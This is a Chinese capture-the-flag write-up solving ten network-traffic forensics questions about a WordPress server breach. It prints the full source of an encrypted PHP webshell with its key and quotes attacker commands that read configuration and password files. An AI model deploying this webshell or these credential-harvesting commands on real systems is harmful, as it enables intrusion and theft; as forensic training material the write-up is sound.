DIDCTF-2024龙信杯-流量分析

admin 2025年2月9日01:19:48评论39 views字数 2137阅读7分7秒阅读模式

前言

记录DIDCTF中的2024龙信杯的流量分析题目。

1、流量分析-1

分析流量包检材,给出管理员对web环境进行管理的工具名。(标准格式:小皮)

这个题真是学到了,从DNS记录里看到,服务器请求了宝塔(check.bt.cn):

DIDCTF-2024龙信杯-流量分析

所以使用的管理工具是宝塔

2、流量分析-2

分析流量包检材,给出攻击者的ip地址是多少。(标准格式:127.0.0.1)

随便找个攻击的请求,我这里找到的TCP流的597:

DIDCTF-2024龙信杯-流量分析

这个肯定是木马的流量了,请求方向是192.168.209.135->192.168.209.147

攻击者IP:192.168.209.135

3、流量分析-3

分析流量包检材,给出攻击者爆破出的网站非管理员用户名是。(标准格式:admin)

wordpress的登录页面是wp-login.php,直接过滤http contains "wp-login.php"

账号不存在则返回:错误:未在本站点注册……

DIDCTF-2024龙信杯-流量分析

所有登录的请求都在TCP流的56中,这也是个考眼力的题:

DIDCTF-2024龙信杯-流量分析
DIDCTF-2024龙信杯-流量分析

显示密码不正确说明用户名是对的,总共这两个正确的用户名:luna、saber

至于哪个是非管理员从名字也看不出来,提交后答案是:saber

4、流量分析-4

分析流量包检材,攻击者进行目录扫描得到的具有后门的页面url路径为。(标准格式:/abc.html)

首先看到后面一直在请求cont.php文件,并且看了一下应该就是木马的流量:

DIDCTF-2024龙信杯-流量分析

那就是上传了这个cont.php,那么我们找到上传的页面应该就是了……

最后在TCP流的93:

DIDCTF-2024龙信杯-流量分析

上传页面是up_load.php,提交不对……格式是:/up_load.html

5、流量分析-5

分析流量包检材,攻击者通过修改请求包中的哪个字段导致恶意文件成功上传。(标准格式:test-type)

TCP流的93,还是上个题的图,如果上传的是php文件,文件类型不可能是image/jpeg,所以肯定是修改的Content-Type

6、流量分析-6

分析流量包检材,攻击者上传成功的恶意文件, 该文件的临时存放路径是。(标准格式:/abc/edf)

TCP流的93肯定是上传的恶意文件,查看服务器的返回信息:

DIDCTF-2024龙信杯-流量分析

路径:/tmp/php38mbeJ

7、流量分析-7

分析流量包检材,服务器php配置文件的存放位置(标准格式:/www/sev/php.ini)

这个估计在攻击者执行的命令中,那么要先对流量包进行解密了,先找到cont.php的源码:

# tcp.stream eq 93<?php@error_reporting(0);session_start(); $key="e45e329feb5d925b"; $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input");if(!extension_loaded('openssl')) {  $t="base64_"."decode";  $post=$t($post."");for($i=0;$i<strlen($post);$i++) {        $post[$i] = $post[$i]^$key[$i+1&15];        } }else {  $post=openssl_decrypt($post, "AES128", $key); }    $arr=explode('|',$post);    $func=$arr[0];    $params=$arr[1];classC{publicfunction__invoke($p){eval($p."");}}    @call_user_func(new C(),$params);?>

根据代码解密通信流量:(加密方式CBC,IV要输32个0,不然解不开,原因不知道)

DIDCTF-2024龙信杯-流量分析

过滤出所有的cont.php的流量http contains "cont.php",然后一个个解密与分析,找到TCP流的94是phpinfo界面:

DIDCTF-2024龙信杯-流量分析

但是里面大多数都是图片的base64,无法直观的看到,一个个转图片又很麻烦,所以直接把代码保存为html,用浏览器打开,得到了phpinfo页面:

DIDCTF-2024龙信杯-流量分析

直接看到了php.ini的路径:/www/server/php/82/etc/php.ini

8、流量分析-8

分析流量包检材,被攻击的web环境其数据库密码是。(标准格式:qwer1234)

TCP流的127:

攻击者执行了cat wp-config.php

DIDCTF-2024龙信杯-流量分析

页面返回了wp-config.php的内容:

DIDCTF-2024龙信杯-流量分析

密码:X847Z3QzF1a6MHjR

9、流量分析-9

分析流量包检材,服务器管理存放临时登录密码的位置。(标准格式:/tmp/pass)

TCP流的609:

攻击者执行了find / -name "*pass*" 2>/dev/null > files

DIDCTF-2024龙信杯-流量分析

页面返回的结果如下:

DIDCTF-2024龙信杯-流量分析

在里面找到/tmp/tmppass

10、流量分析-10

分析流量包检材,黑客获取的高权限主机的登录密码。(标准格式:qwer1234)

在TCP流的612中,攻击者执行了:cat /tmp/tmppass

DIDCTF-2024龙信杯-流量分析

那么解密服务器返回的流量:

DIDCTF-2024龙信杯-流量分析

密码:passwd!@#

原文始发于微信公众号(南有禾木):DIDCTF-2024龙信杯-流量分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月9日01:19:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DIDCTF-2024龙信杯-流量分析https://cn-sec.com/archives/3703276.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息